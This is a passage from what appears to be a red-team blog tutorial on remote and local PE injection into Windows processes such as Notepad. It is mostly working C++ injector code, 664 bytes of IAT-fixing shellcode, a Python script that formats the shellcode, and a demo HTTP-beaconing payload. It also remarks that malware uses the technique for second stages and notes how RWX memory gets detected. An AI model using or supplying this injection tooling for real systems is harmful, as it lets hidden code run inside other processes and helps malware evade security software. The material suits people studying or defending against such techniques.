        PIMAGE_NT_HEADERS64 pMappedCurrentDLLNTHeader = (PIMAGE_NT_HEADERS64)(((PIMAGE_DOS_HEADER)mappedPEFile)->e_lfanew + (LPBYTE)mappedPEFile);
        PIMAGE_IMPORT_DESCRIPTOR pMappedCurrentDLLImportDescriptor = (PIMAGE_IMPORT_DESCRIPTOR)(pMappedCurrentDLLNTHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress + (LPBYTE)mappedPEFile);

        while (pMappedCurrentDLLImportDescriptor->Name != NULL) {
                LPSTR currentDLLName = (LPSTR)(pMappedCurrentDLLImportDescriptor->Name + (LPBYTE)mappedPEFile);
                HMODULE hCurrentDLLModule = pLoadLibraryAAddress(currentDLLName);

                PIMAGE_THUNK_DATA64 pImageThunkData = (PIMAGE_THUNK_DATA64)(pMappedCurrentDLLImportDescriptor->FirstThunk + (LPBYTE)mappedPEFile);

                while (pImageThunkData->u1.AddressOfData) {

                        if (pImageThunkData->u1.Ordinal & 0x8000000000000000) {
                                // Import is by ordinal

                                FARPROC resolvedImportAddress = pGetProcAddressAddress(hCurrentDLLModule, MAKEINTRESOURCEA(pImageThunkData->u1.Ordinal));

                                if (resolvedImportAddress == NULL) {
                                        return;
                                }

                                // Overwrite entry in IAT with the address of resolved function
                                pImageThunkData->u1.AddressOfData = (ULONGLONG)resolvedImportAddress;

                        }
                        else {
                                // Import is by name
                                PIMAGE_IMPORT_BY_NAME pAddressOfImportData = (PIMAGE_IMPORT_BY_NAME)((pImageThunkData->u1.AddressOfData) + (LPBYTE)mappedPEFile);
                                FARPROC resolvedImportAddress = pGetProcAddressAddress(hCurrentDLLModule, pAddressOfImportData->Name);

                                if (resolvedImportAddress == NULL) {
                                        return;
                                }

                                // Overwrite entry in IAT with the address of resolved function
                                pImageThunkData->u1.AddressOfData = (ULONGLONG)resolvedImportAddress;

                        }

                        pImageThunkData++;
                }

                pMappedCurrentDLLImportDescriptor++;
        }

Resolve the IAT Table

Finally, after the IAT is fixed up the shellcode will redirect its execution to the main payload by calling the entrypoint. This will ensure that the thread created for the IAT shellcode is reused to execute the payload as well.

        /*
        Step 3: Jump to the entrypoint of the payload
        */

        void (*pEntryPoint)(void) = (void (*)()) (pMappedCurrentDLLNTHeader->OptionalHeader.AddressOfEntryPoint + (LPBYTE)mappedPEFile);
        pEntryPoint();
}

Jump to the Payload Entrypoint

Once the code was written and compiled in Visual Studio the function was located in IDA. Since this function was designed to be position independent and not dependent on anything hardcoded the raw code bytes can be copied out to use as shellcode.

PositionIndependentIATResolver Function Copied from IDA as Raw Bytes

The following Python script was used to create a valid C syntax array so the shellcode can be added to any software that will require it.

shellcode = "41574883EC4065488B0425600000004C8BF9488B50184C8B5A20660F1F4400004D8B53504533C0664539027410498BC249FFC0488D40026683380075F333D2448D4A354D85C074300F1F840000000000410FB70C5248FFC24169C19EF2100003C881E1FFFFFF004403C9493BD072E14181F967400C0574114D8B1B41837B7000759E4883C440415FC348895C2450498B5B204885DB0F84F10100004863433C48896C2460488974246833F648897C24388B8C18880000004803CB4C896424304C896C24284533E44C897424204533F68B41188B69208B79244803EB448B691C4803FB4C03EB8944245885C00F847D0100000F1F40006666660F1F840000000000448B550033D24C03D3450FB61A4584DB741A498BC26666660F1F84000000000048FFC2488D400180380075F44533C041B9350000004885D27439660F1F440000430FBE0C1049FFC04169C19EF2100003C881E1FFFFFF004403C94C3BC272E14181F99DE0A305750B0FB707418B7485004803F333D24584DB7412498BC20F1F0048FFC2488D400180380075F44533C041B9350000004885D27439660F1F440000430FBE0C1049FFC04169C19EF2100003C881E1FFFFFF004403C94C3BC272E14181F941F26906750B0FB707458B6485004C03E34D85E474054885F6751641FFC64883C5044883C702443B7424580F820DFFFFFF4D85E474764885F6747149636F3C468BB43D900000004983C60C4D03F7418B0685C0744D8BC84903CF41FFD4418B5E04488BF84903DF488B0B4885C9742779050FB7D1EB07498D57024803D1488BCFFFD64885C074254889034883C308488B0B4885C975D9418B46144983C61485C075B3428B443D284903C7FFD04C8B6C24284C8B642430488B7C2438488B742468488B6C24604C8B742420488B5C24504883C440415FC3"

formatted_bytes = []

for byte_index in range(0,len(shellcode),2):

    current_byte = "0x" + str(shellcode[byte_index:byte_index+2])
    formatted_bytes.append(current_byte)

shellcode_length = len(formatted_bytes)

print("BYTE iatFixShellArray[] = { ", end='')
for index, shellcode_byte in enumerate(formatted_bytes):
    print(shellcode_byte, end='')

    # Ensure we don't print a ',' at the very end
    if index != (shellcode_length - 1):
        print(",", end='')

print(" };")
print("SIZE_T iatFixShellArrayLength = {};\n".format(shellcode_length))

Create C Array from Raw Bytes

The output of the above Python script can be seen below.

Shellcode in C Array

Remote Portable Executable Injector

The remote portable executable injector will be responsible for injecting the payload into another remote process. Optionally, if the payload has an IAT to construct, helper shellcode will be injected with the payload to perform this task.

Load the Target Payload

The first step is to read the payload file from disk. This is achieved by using CreateFileA to open the file, GetFileSize to determine how much heap space to allocate via HeapAlloc, and ReadFile to read the file into that heap space. The payload in this case is read from disk for example purposes; however, it is possible to download it from the network or any other location as well.

        HANDLE hExePayloadFile = CreateFileA(&(exePath[0]), GENERIC_READ, NULL, NULL, OPEN_EXISTING, NULL, NULL);
        if (hExePayloadFile == INVALID_HANDLE_VALUE) {
                std::cout << GetLastErrorAsString();
                return -1;
        }

        DWORD exePayloadFileSize = GetFileSize(hExePayloadFile, NULL);
        if (exePayloadFileSize == INVALID_FILE_SIZE) {
                std::cout << GetLastErrorAsString();
                return -1;
        }

        PIMAGE_DOS_HEADER pExePayloadUnmapped = (PIMAGE_DOS_HEADER)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, exePayloadFileSize);
        if (pExePayloadUnmapped == NULL) {
                std::cout << GetLastErrorAsString();
                return -1;
        }

        // lpNumberOfBytesRead may only be NULL when lpOverlapped is not NULL
        DWORD bytesRead = 0;
        if (!ReadFile(hExePayloadFile, pExePayloadUnmapped, exePayloadFileSize, &bytesRead, NULL)) {
                std::cout << GetLastErrorAsString();
                return -1;
        }

        CloseHandle(hExePayloadFile);

Reading the Payload from Disk into Memory

Map the Target Payload

The next step is to map the payload. This is required because, to execute the file, it must be stored in its virtual memory representation rather than its on-disk representation. To start we allocate enough heap space to store the mapped PE file.

        // Allocate new heap space for mapped executable

        PIMAGE_NT_HEADERS64 pExePayloadNTHeaders = (PIMAGE_NT_HEADERS64)(pExePayloadUnmapped->e_lfanew + (LPBYTE)pExePayloadUnmapped);

        PIMAGE_DOS_HEADER pExePayloadMapped = (PIMAGE_DOS_HEADER)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, pExePayloadNTHeaders->OptionalHeader.SizeOfImage);
        if (pExePayloadMapped == NULL) {
                std::cout << GetLastErrorAsString();
                return -1;
        }

Allocate a Buffer for the Mapped Version of the Payload

Next, the PE headers are copied directly to the newly allocated buffer space. There are no changes required to the headers.

        // Copy headers to mapped memory space

        DWORD totalHeaderSize = pExePayloadNTHeaders->OptionalHeader.SizeOfHeaders;
        memcpy_s(pExePayloadMapped, totalHeaderSize, pExePayloadUnmapped, totalHeaderSize);

Copy the PE Headers into Buffer

Afterwards, the PE sections are copied over. When copying the PE sections, the virtual address of each section is used to determine its destination, rather than the raw offset that is used when the file is on disk.

        // Map PE sections into mapped memory space

        DWORD numberOfSections = pExePayloadNTHeaders->FileHeader.NumberOfSections;
        PIMAGE_SECTION_HEADER pCurrentSection = (PIMAGE_SECTION_HEADER)(pExePayloadNTHeaders->FileHeader.SizeOfOptionalHeader + (LPBYTE) & (pExePayloadNTHeaders->OptionalHeader));

        for (DWORD i = 0; i < numberOfSections; i++, pCurrentSection++) {

                if (pCurrentSection->SizeOfRawData != 0) {
                        LPBYTE pSourceSectionData = pCurrentSection->PointerToRawData + (LPBYTE)pExePayloadUnmapped;
                        LPBYTE pDestinationSectionData = pCurrentSection->VirtualAddress + (LPBYTE)pExePayloadMapped;
                        DWORD sectionSize = pCurrentSection->SizeOfRawData;

                        memcpy_s(pDestinationSectionData, sectionSize, pSourceSectionData, sectionSize);
                }
        }

Copy PE Sections into Buffer by Virtual Address Offset
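
The same mapping logic can be sketched in Python for experimenting outside of Windows. This is an illustrative sketch and not the injector's code: the function name map_pe_image is made up, and only the fields needed for mapping are parsed.

```python
import struct


def map_pe_image(raw: bytes) -> bytearray:
    """Lay out an on-disk PE file the way it would appear in memory."""
    e_lfanew = struct.unpack_from("<I", raw, 0x3C)[0]
    number_of_sections = struct.unpack_from("<H", raw, e_lfanew + 6)[0]
    size_of_optional_header = struct.unpack_from("<H", raw, e_lfanew + 20)[0]

    optional_header = e_lfanew + 24
    # SizeOfImage and SizeOfHeaders sit at the same offsets in PE32 and PE32+
    size_of_image, size_of_headers = struct.unpack_from("<II", raw, optional_header + 56)

    mapped = bytearray(size_of_image)
    mapped[:size_of_headers] = raw[:size_of_headers]  # headers are copied unchanged

    section_table = optional_header + size_of_optional_header
    for index in range(number_of_sections):
        entry = section_table + index * 40  # sizeof(IMAGE_SECTION_HEADER)
        _virtual_size, virtual_address, raw_size, raw_pointer = struct.unpack_from(
            "<IIII", raw, entry + 8)
        if raw_size == 0:
            continue
        data = raw[raw_pointer:raw_pointer + raw_size]
        if virtual_address + len(data) > size_of_image:
            raise ValueError("section does not fit inside SizeOfImage")
        # Destination is the virtual address, source is the raw file offset
        mapped[virtual_address:virtual_address + len(data)] = data

    return mapped
```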

Allocate Memory in Target Process

Next, a process handle is opened to the process we would like to inject into. In this example notepad is used.

        // Find PID of Target Process
        LPCWSTR injectionTargetProcess = L"notepad.exe";
        DWORD injectionTargetProcessID = FindProcessID((LPWSTR)injectionTargetProcess);

        if (injectionTargetProcessID == -1) {
                wprintf(L"Could not find process: %ls", injectionTargetProcess);
                return 0;
        }

        wprintf(L"Injecting into %ls (%d)\n", injectionTargetProcess, injectionTargetProcessID);

        HANDLE hTargetProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, injectionTargetProcessID);
        if (hTargetProcess == NULL) {
                std::string errorMessage = GetLastErrorAsString();
                std::cout << "Failed to acquire handle to process: " << errorMessage << "\n";
                return -1;
        }

Allocate Memory in Remote Process

VirtualAllocEx is used to allocate a buffer in the notepad process. This buffer is made readable, writable, and executable so that the payload can be written to it and executed in the remote process.

One of the main reasons for performing this allocation at this stage is that when fixing the Base Relocation Table it is critical to know the address the PE file will be located at. In this case the address is stored in pRemoteMappedBuffer.

        LPVOID pRemoteMappedBuffer = VirtualAllocEx(hTargetProcess, NULL, pExePayloadNTHeaders->OptionalHeader.SizeOfImage, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
        if (pRemoteMappedBuffer == NULL) {
                std::string errorMessage = GetLastErrorAsString();
                std::cout << errorMessage << "\n";
                return -1;
        }

Allocate Memory in Remote Process for the Payload

Update the Base Relocation Table

The Base Relocation Table will need to be updated in order to ensure that any hardcoded address in the payload resolves properly with the new base address. Note that the updated values are relative to the address we allocated with VirtualAllocEx.

        DWORD baseRelocationRVA = pExePayloadNTHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress;
        PIMAGE_BASE_RELOCATION pCurrentBaseRelocation = (PIMAGE_BASE_RELOCATION)(baseRelocationRVA + (LPBYTE)pExePayloadMapped);

        while (pCurrentBaseRelocation->VirtualAddress != NULL && baseRelocationRVA != 0) {

                DWORD relocationEntryCount = (pCurrentBaseRelocation->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) / sizeof(IMAGE_RELOC);
                PIMAGE_RELOC pCurrentBaseRelocationEntry = (PIMAGE_RELOC)((LPBYTE)pCurrentBaseRelocation + sizeof(IMAGE_BASE_RELOCATION));

                for (DWORD i = 0; i < relocationEntryCount; i++, pCurrentBaseRelocationEntry++) {
                        if (pCurrentBaseRelocationEntry->type == IMAGE_REL_BASED_DIR64) {

                                ULONGLONG* pRelocationValue = (ULONGLONG*)((LPBYTE)pExePayloadMapped + (ULONGLONG)((ULONGLONG)pCurrentBaseRelocation->VirtualAddress + pCurrentBaseRelocationEntry->offset));
                                ULONGLONG updatedRelocationValue = (ULONGLONG)((*pRelocationValue - pExePayloadNTHeaders->OptionalHeader.ImageBase) + (LPBYTE)pRemoteMappedBuffer);
                                *pRelocationValue = updatedRelocationValue;
                        }
                }

                // Increment current base relocation entry to the next one, we do this by adding its total size to the current offset
                pCurrentBaseRelocation = (PIMAGE_BASE_RELOCATION)((LPBYTE)pCurrentBaseRelocation + pCurrentBaseRelocation->SizeOfBlock);
        }

Update Base Relocation Table
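
To make the arithmetic easier to follow, here is a small Python sketch of the same relocation pass over a mapped image buffer. It is a simplified illustration with invented names: unlike the C++ loop above it stops based on the directory size rather than a zero VirtualAddress, and it only handles IMAGE_REL_BASED_DIR64 entries.

```python
import struct

IMAGE_REL_BASED_DIR64 = 10


def apply_relocations(image: bytearray, reloc_rva: int, reloc_size: int,
                      old_base: int, new_base: int) -> None:
    """Rebase every DIR64 relocation target from old_base to new_base."""
    delta = new_base - old_base
    cursor = reloc_rva
    end = reloc_rva + reloc_size

    while cursor + 8 <= end:
        page_rva, block_size = struct.unpack_from("<II", image, cursor)
        if block_size < 8:
            break  # malformed block, stop instead of looping forever

        entry_count = (block_size - 8) // 2  # each entry is one WORD
        for index in range(entry_count):
            entry = struct.unpack_from("<H", image, cursor + 8 + index * 2)[0]
            relocation_type = entry >> 12   # upper 4 bits
            page_offset = entry & 0xFFF     # lower 12 bits
            if relocation_type != IMAGE_REL_BASED_DIR64:
                continue
            target = page_rva + page_offset
            value = struct.unpack_from("<Q", image, target)[0]
            struct.pack_into("<Q", image, target, (value + delta) & 0xFFFFFFFFFFFFFFFF)

        # Move to the next block by adding the size of the current one
        cursor += block_size
```

Here old_base would be the ImageBase from the optional header and new_base the address returned by VirtualAllocEx.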

Copy Mapped Payload to Target Process

Now that the PE file is mapped and has the Base Relocation Table fixed up, the entire mapped PE file can be copied over to the target process.

        if (!WriteProcessMemory(hTargetProcess, pRemoteMappedBuffer, (LPVOID)pExePayloadMapped, pExePayloadNTHeaders->OptionalHeader.SizeOfImage, NULL)) {
                std::string errorMessage = GetLastErrorAsString();
                std::cout << errorMessage << "\n";
                return -1;
        }

Injection of Payload

Injection with IAT Fixing Shellcode

If the PE payload has an IAT, it will need to be resolved inside of the remote process. This is because other DLLs that the payload depends on, such as Wininet.dll, may need to be loaded.

In this injection option if the PE payload has an IAT, optional IAT resolving shellcode will be injected into the target process. In this case we have our shellcode stored in iatFixShellArray. A new readable, writable, and executable buffer is created in the remote process to accommodate this shellcode.

Once the shellcode is written to the remote process it can be invoked via CreateRemoteThread. One important aspect is that the address of the PE payload is passed to the shellcode. This is important as the shellcode needs to know where in memory the PE payload is located in order to fix the IAT of the payload.

After the shellcode is finished running, it will redirect execution to the PE payload in the same thread it was running.

        DWORD importDescriptorRVA = pExePayloadNTHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress;

        if (importDescriptorRVA != 0) {

                BYTE iatFixShellArray[] = { 0x41,0x57,0x48,0x83,0xEC,0x40,0x65,0x48,0x8B,0x04,0x25,0x60,0x00,0x00,0x00,0x4C,0x8B,0xF9,0x48,0x8B,0x50,0x18,0x4C,0x8B,0x5A,0x20,0x66,0x0F,0x1F,0x44,0x00,0x00,0x4D,0x8B,0x53,0x50,0x45,0x33,0xC0,0x66,0x45,0x39,0x02,0x74,0x10,0x49,0x8B,0xC2,0x49,0xFF,0xC0,0x48,0x8D,0x40,0x02,0x66,0x83,0x38,0x00,0x75,0xF3,0x33,0xD2,0x44,0x8D,0x4A,0x35,0x4D,0x85,0xC0,0x74,0x30,0x0F,0x1F,0x84,0x00,0x00,0x00,0x00,0x00,0x41,0x0F,0xB7,0x0C,0x52,0x48,0xFF,0xC2,0x41,0x69,0xC1,0x9E,0xF2,0x10,0x00,0x03,0xC8,0x81,0xE1,0xFF,0xFF,0xFF,0x00,0x44,0x03,0xC9,0x49,0x3B,0xD0,0x72,0xE1,0x41,0x81,0xF9,0x67,0x40,0x0C,0x05,0x74,0x11,0x4D,0x8B,0x1B,0x41,0x83,0x7B,0x70,0x00,0x75,0x9E,0x48,0x83,0xC4,0x40,0x41,0x5F,0xC3,0x48,0x89,0x5C,0x24,0x50,0x49,0x8B,0x5B,0x20,0x48,0x85,0xDB,0x0F,0x84,0xF1,0x01,0x00,0x00,0x48,0x63,0x43,0x3C,0x48,0x89,0x6C,0x24,0x60,0x48,0x89,0x74,0x24,0x68,0x33,0xF6,0x48,0x89,0x7C,0x24,0x38,0x8B,0x8C,0x18,0x88,0x00,0x00,0x00,0x48,0x03,0xCB,0x4C,0x89,0x64,0x24,0x30,0x4C,0x89,0x6C,0x24,0x28,0x45,0x33,0xE4,0x4C,0x89,0x74,0x24,0x20,0x45,0x33,0xF6,0x8B,0x41,0x18,0x8B,0x69,0x20,0x8B,0x79,0x24,0x48,0x03,0xEB,0x44,0x8B,0x69,0x1C,0x48,0x03,0xFB,0x4C,0x03,0xEB,0x89,0x44,0x24,0x58,0x85,0xC0,0x0F,0x84,0x7D,0x01,0x00,0x00,0x0F,0x1F,0x40,0x00,0x66,0x66,0x66,0x0F,0x1F,0x84,0x00,0x00,0x00,0x00,0x00,0x44,0x8B,0x55,0x00,0x33,0xD2,0x4C,0x03,0xD3,0x45,0x0F,0xB6,0x1A,0x45,0x84,0xDB,0x74,0x1A,0x49,0x8B,0xC2,0x66,0x66,0x66,0x0F,0x1F,0x84,0x00,0x00,0x00,0x00,0x00,0x48,0xFF,0xC2,0x48,0x8D,0x40,0x01,0x80,0x38,0x00,0x75,0xF4,0x45,0x33,0xC0,0x41,0xB9,0x35,0x00,0x00,0x00,0x48,0x85,0xD2,0x74,0x39,0x66,0x0F,0x1F,0x44,0x00,0x00,0x43,0x0F,0xBE,0x0C,0x10,0x49,0xFF,0xC0,0x41,0x69,0xC1,0x9E,0xF2,0x10,0x00,0x03,0xC8,0x81,0xE1,0xFF,0xFF,0xFF,0x00,0x44,0x03,0xC9,0x4C,0x3B,0xC2,0x72,0xE1,0x41,0x81,0xF9,0x9D,0xE0,0xA3,0x05,0x75,0x0B,0x0F,0xB7,0x07,0x41,0x8B,0x74,0x85,0x00,0x48,0x03,0xF3,0x33,0xD2,0x45,0x84,0xDB,0x74,0x12,0x49,0x8B,0xC2,0x0F,0x1F,0x00,0x48,0xFF,0xC2,0x48,0x8D,0x40,0x01,0x80,0x38,0x00,0x75,0xF4,0x45,0x33,0xC0,0x41,0xB9,0x35,0x00,0x00,0x00,0x48,0x85,0xD2,0x74,0x39,0x66,0x0F,0x1F,0x44,0x00,0x00,0x43,0x0F,0xBE,0x0C,0x10,0x49,0xFF,0xC0,0x41,0x69,0xC1,0x9E,0xF2,0x10,0x00,0x03,0xC8,0x81,0xE1,0xFF,0xFF,0xFF,0x00,0x44,0x03,0xC9,0x4C,0x3B,0xC2,0x72,0xE1,0x41,0x81,0xF9,0x41,0xF2,0x69,0x06,0x75,0x0B,0x0F,0xB7,0x07,0x45,0x8B,0x64,0x85,0x00,0x4C,0x03,0xE3,0x4D,0x85,0xE4,0x74,0x05,0x48,0x85,0xF6,0x75,0x16,0x41,0xFF,0xC6,0x48,0x83,0xC5,0x04,0x48,0x83,0xC7,0x02,0x44,0x3B,0x74,0x24,0x58,0x0F,0x82,0x0D,0xFF,0xFF,0xFF,0x4D,0x85,0xE4,0x74,0x76,0x48,0x85,0xF6,0x74,0x71,0x49,0x63,0x6F,0x3C,0x46,0x8B,0xB4,0x3D,0x90,0x00,0x00,0x00,0x49,0x83,0xC6,0x0C,0x4D,0x03,0xF7,0x41,0x8B,0x06,0x85,0xC0,0x74,0x4D,0x8B,0xC8,0x49,0x03,0xCF,0x41,0xFF,0xD4,0x41,0x8B,0x5E,0x04,0x48,0x8B,0xF8,0x49,0x03,0xDF,0x48,0x8B,0x0B,0x48,0x85,0xC9,0x74,0x27,0x79,0x05,0x0F,0xB7,0xD1,0xEB,0x07,0x49,0x8D,0x57,0x02,0x48,0x03,0xD1,0x48,0x8B,0xCF,0xFF,0xD6,0x48,0x85,0xC0,0x74,0x25,0x48,0x89,0x03,0x48,0x83,0xC3,0x08,0x48,0x8B,0x0B,0x48,0x85,0xC9,0x75,0xD9,0x41,0x8B,0x46,0x14,0x49,0x83,0xC6,0x14,0x85,0xC0,0x75,0xB3,0x42,0x8B,0x44,0x3D,0x28,0x49,0x03,0xC7,0xFF,0xD0,0x4C,0x8B,0x6C,0x24,0x28,0x4C,0x8B,0x64,0x24,0x30,0x48,0x8B,0x7C,0x24,0x38,0x48,0x8B,0x74,0x24,0x68,0x48,0x8B,0x6C,0x24,0x60,0x4C,0x8B,0x74,0x24,0x20,0x48,0x8B,0x5C,0x24,0x50,0x48,0x83,0xC4,0x40,0x41,0x5F,0xC3 };
                SIZE_T iatFixShellArrayLength = 664;


                LPVOID pIATFixShellcode = VirtualAllocEx(hTargetProcess, NULL, iatFixShellArrayLength, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
                if (pIATFixShellcode == NULL) {
                        std::string errorMessage = GetLastErrorAsString();
                        std::cout << errorMessage << "\n";
                        return -1;
                }

                if (!WriteProcessMemory(hTargetProcess, pIATFixShellcode, (LPVOID)iatFixShellArray, iatFixShellArrayLength, NULL)) {
                        std::string errorMessage = GetLastErrorAsString();
                        std::cout << errorMessage << "\n";
                        return -1;
                }

                HANDLE hRemoteThread = CreateRemoteThread(hTargetProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pIATFixShellcode, pRemoteMappedBuffer, 0, NULL);
                if (hRemoteThread == NULL) {
                        std::string errorMessage = GetLastErrorAsString();
                        std::cout << errorMessage << "\n";
                        return -1;
                }
        }

Inject and Run the IAT Fixer Shellcode

Direct Injection

Alternatively, if the PE payload has no import table, there is no need to inject the shellcode. CreateRemoteThread can invoke the entry point of the PE payload directly.

        else if (importDescriptorRVA == 0) {

                LPTHREAD_START_ROUTINE pEntryPoint = (LPTHREAD_START_ROUTINE)(pExePayloadNTHeaders->OptionalHeader.AddressOfEntryPoint + (LPBYTE)pRemoteMappedBuffer);

                // dwCreationFlags is a DWORD, so pass 0 (run immediately) rather than NULL
                HANDLE hRemoteThread = CreateRemoteThread(hTargetProcess, NULL, 0, pEntryPoint, NULL, 0, NULL);
                if (hRemoteThread == NULL) {
                        std::string errorMessage = GetLastErrorAsString();
                        std::cout << errorMessage << "\n";
                        return -1;
                }

        }

Run the Injected PE Entrypoint as a New Thread

Remote Portable Executable Injection Demonstration

The following GIF provides a video demonstration of the injection process. We can see the injector running and injecting into a Notepad process (PID 2008). At the same time Process Hacker shows activity in the threads of the process, and shortly after HTTP traffic starts flowing in Wireshark, indicating a successful injection.

Injection Demonstration

Looking deeper into the Notepad process with Process Hacker we can see there is a section of memory that is readable, writable, and executable storing the bytes associated with the IAT fixing shellcode.

IAT Fixer Shellcode Injected

We can also see another readable, writable, and executable memory space that stores the PE payload.

Injected Payload

Local Portable Executable Injection

Aleks — Wed, 24 May 2023 17:46:32 GMT

This post will introduce the concept of injecting PE files into a local process. Previously, both DLL Injection and Reflective DLL Injection techniques were discussed to allow code execution in another process.

This technique will focus on the execution of a payload within a local process. The benefit of this technique over Reflective DLL Injection is that it does not require a DLL or any premade shellcode for execution.

This form of injection is typically used in malware that is downloading another component, such as a second stage, to execute on a system.

Source Code for Examples

The associated code example for this post can be found at the following link.

Payload

int sendHTTPRequest() {

        LPCSTR userAgent = "agent";
        LPCSTR connectDomain = "google.com";
        LPCSTR httpRequestType = "GET";
        LPCSTR targetPath = "/test";

        HINTERNET internetHandle = InternetOpenA(userAgent, INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);
        if (internetHandle == NULL) {
                return -1;
        }

        DWORD_PTR dwService = (DWORD_PTR)NULL;

        HINTERNET httpHandle = InternetConnectA(internetHandle, connectDomain, INTERNET_DEFAULT_HTTP_PORT, NULL, NULL, INTERNET_SERVICE_HTTP, 0, dwService);
        if (httpHandle == NULL) {
                return -1;
        }

        HINTERNET httpRequestHandle = HttpOpenRequestA(httpHandle, httpRequestType, targetPath, NULL, NULL, NULL, 0, dwService);
        if (httpRequestHandle == NULL) {
                return -1;
        }

        BOOL result = HttpSendRequestA(httpRequestHandle, NULL, 0, NULL, 0);
        InternetCloseHandle(internetHandle);

        return 1;
}

HTTP Request Function that acts as our "Payload"

The loopHTTPConnect function will be responsible for looping through the sendHTTPRequest function every two seconds.

void loopHTTPConnect() {

        while (true) {
                Sleep(2000);
                sendHTTPRequest();
                printf("Sent HTTP Request\n");
        }

}

Function that loops through the "Payload" function

int main() {

        printf("HTTP Payload Sending Starting\n");
        loopHTTPConnect();
}

The Payload's Main Function

Local Portable Executable Injector

The local portable executable injector will be responsible for loading the payload and executing it inside of itself as a new thread.

Load the Target Payload

        HANDLE hExePayloadFile = CreateFileA(&(exePath[0]), GENERIC_READ, NULL, NULL, OPEN_EXISTING, NULL, NULL);
        if (hExePayloadFile == INVALID_HANDLE_VALUE) {
                std::cout << GetLastErrorAsString();
                return -1;
        }

        DWORD exePayloadFileSize = GetFileSize(hExePayloadFile, NULL);
        if (exePayloadFileSize == INVALID_FILE_SIZE) {
                std::cout << GetLastErrorAsString();
                return -1;
        }

        PIMAGE_DOS_HEADER pExePayloadUnmapped = (PIMAGE_DOS_HEADER)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, exePayloadFileSize);
        if (pExePayloadUnmapped == NULL) {
                std::cout << GetLastErrorAsString();
                return -1;
        }

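        // lpNumberOfBytesRead may only be NULL when an OVERLAPPED structure is supplied
        DWORD bytesRead = 0;
        if (!ReadFile(hExePayloadFile, pExePayloadUnmapped, exePayloadFileSize, &bytesRead, NULL) || bytesRead != exePayloadFileSize) {
                std::cout << GetLastErrorAsString();
                return -1;
        }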

Reading the Payload from Disk into Memory
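
The later snippets cast the buffer straight to PIMAGE_NT_HEADERS64, so it can be worth confirming first that the bytes really are a 64-bit PE file. The following is a minimal, portable sketch of such a check. The names ReadAt and LooksLikePe64 and the use of std::vector are assumptions made for illustration and are not part of the post's injector; the offsets and magic values come from the PE format, and a little-endian host is assumed.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>
#include <vector>

// Hypothetical helper: bounds-checked read of a fixed-size field.
template <typename T>
static bool ReadAt(const std::vector<uint8_t>& buf, size_t offset, T& out) {
    if (offset > buf.size() || buf.size() - offset < sizeof(T)) return false;
    std::memcpy(&out, buf.data() + offset, sizeof(T));
    return true;
}

// Hypothetical helper: true when the buffer looks like a 64-bit (PE32+) image.
bool LooksLikePe64(const std::vector<uint8_t>& file) {
    uint16_t mz = 0, machine = 0, optionalMagic = 0;
    uint32_t lfanew = 0, signature = 0;

    if (!ReadAt(file, 0, mz) || mz != 0x5A4D) return false;           // "MZ"
    if (!ReadAt(file, 0x3C, lfanew)) return false;                     // e_lfanew
    if (!ReadAt(file, lfanew, signature) || signature != 0x00004550)   // "PE\0\0"
        return false;
    if (!ReadAt(file, size_t(lfanew) + 4, machine) || machine != 0x8664)
        return false;                                                  // AMD64
    if (!ReadAt(file, size_t(lfanew) + 24, optionalMagic) || optionalMagic != 0x20B)
        return false;                                                  // PE32+
    return true;
}
```

In the injector this check would sit between ReadFile and the header cast, returning early when it fails.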

Map the Target Payload

At this point we have read the file into a buffer, but we cannot execute it yet. At minimum, most files need to be mapped into memory and then fixed up by resolving the Import Address Table (IAT) and applying the base relocation table. Moreover, the file currently sits on the heap, which is not executable by default.

First, we use VirtualAlloc to allocate memory that is readable, writable, and executable. The file we read from disk into the heap will be copied and run in this allocated buffer.

        PIMAGE_NT_HEADERS64 pExePayloadNTHeaders = (PIMAGE_NT_HEADERS64)(pExePayloadUnmapped->e_lfanew + (LPBYTE)pExePayloadUnmapped);
        PIMAGE_DOS_HEADER pExePayloadMapped = (PIMAGE_DOS_HEADER)VirtualAlloc(NULL, pExePayloadNTHeaders->OptionalHeader.SizeOfImage,
                MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

        if (pExePayloadMapped == NULL) {
                std::cout << GetLastErrorAsString();
                return -1;
        }

Making the entire allocated buffer readable, writable, and executable is a very lazy way of allocating memory, and it is easily detected by security software that scans memory pages and inspects API calls. Ideally only the .text section is made executable. However, for example purposes we will make the entire buffer executable.
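
As a rough illustration of the stricter approach, each section header's Characteristics field can be translated into the narrowest page protection once mapping and fix-ups are done. This is only a sketch: ProtectionForSection is a hypothetical helper that the post's injector does not contain, and the constants are copied from winnt.h so the snippet compiles without the Windows SDK.

```cpp
#include <cassert>
#include <cstdint>

// Section characteristics (IMAGE_SCN_MEM_*), values from winnt.h.
constexpr uint32_t kScnMemExecute = 0x20000000;
constexpr uint32_t kScnMemRead    = 0x40000000;
constexpr uint32_t kScnMemWrite   = 0x80000000;

// Page protections (PAGE_*), values from winnt.h.
constexpr uint32_t kPageNoAccess         = 0x01;
constexpr uint32_t kPageReadOnly         = 0x02;
constexpr uint32_t kPageReadWrite        = 0x04;
constexpr uint32_t kPageExecute          = 0x10;
constexpr uint32_t kPageExecuteRead      = 0x20;
constexpr uint32_t kPageExecuteReadWrite = 0x40;

// Hypothetical helper: pick the narrowest protection a section asks for.
constexpr uint32_t ProtectionForSection(uint32_t characteristics) {
    const bool x = (characteristics & kScnMemExecute) != 0;
    const bool r = (characteristics & kScnMemRead) != 0;
    const bool w = (characteristics & kScnMemWrite) != 0;
    if (x) return w ? kPageExecuteReadWrite : (r ? kPageExecuteRead : kPageExecute);
    if (w) return kPageReadWrite; // Windows has no write-only protection
    return r ? kPageReadOnly : kPageNoAccess;
}
```

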